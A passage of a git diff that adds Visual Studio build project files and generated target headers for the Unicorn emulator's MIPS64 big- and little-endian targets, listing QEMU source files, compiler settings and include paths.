Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mips.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/config-target.h new file mode 100644 index 0000000..ca9e642 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/config-target.h @@ -0,0 +1,7 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ABI_MIPSN64 1 +#define TARGET_MIPS64 1 +#define TARGET_NAME "mips64" +#define TARGET_MIPS 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj new file mode 100644 index 0000000..4e76dc3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mips64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4A9F9353-DB63-460A-BB1C-9CB519DFD414}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mips64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-mips;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>mips64.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj.filters new file mode 100644 index 0000000..c5aac69 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64-softmmu/mips64-softmmu.vcxproj.filters @@ -0,0 +1,128 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{d5143bfc-0d98-4c10-aa97-eddbc37aca5e}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{c27c2a6c-adb5-4f4a-ae2d-778d1aff259e}</UniqueIdentifier> + </Filter> + <Filter Include="hw\mips"> + <UniqueIdentifier>{39b8b5d5-ffa1-4eb6-ab78-2edb05e49e84}</UniqueIdentifier> + </Filter> + <Filter Include="target-mips"> + <UniqueIdentifier>{a4e58c5f-5143-4c18-b291-2f472259d6d9}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{bbe2ce8b-4fcd-496e-9f45-6f65ada00d84}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{3c66ada6-0f5f-40f5-a62c-c6dee6596791}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h"> + <Filter>target-mips</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\mips64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c"> + <Filter>hw\mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <Filter>target-mips</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c"> + <Filter>target-mips</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/config-target.h new file mode 100644 index 0000000..95c8351 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_ABI_MIPSN64 1 +#define TARGET_MIPS64 1 +#define TARGET_NAME "mips64el" +#define TARGET_MIPS 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj new file mode 100644 index 0000000..03b981b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/mips64el-softmmu/mips64el-softmmu.vcxproj @@ -0,0 +1,237 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\mips-defs.h" /> + <ClInclude Include="..\..\..\qemu\target-mips\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\mips64el.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\addr.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\cputimer.c" /> + <ClCompile Include="..\..\..\qemu\hw\mips\mips_r4k.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\dsp_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\lmi_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\msa_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\op_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-mips\translate_init.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-mips\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{4478909E-6983-425C-9D9F-558CF258E61E}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>mips64elsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + 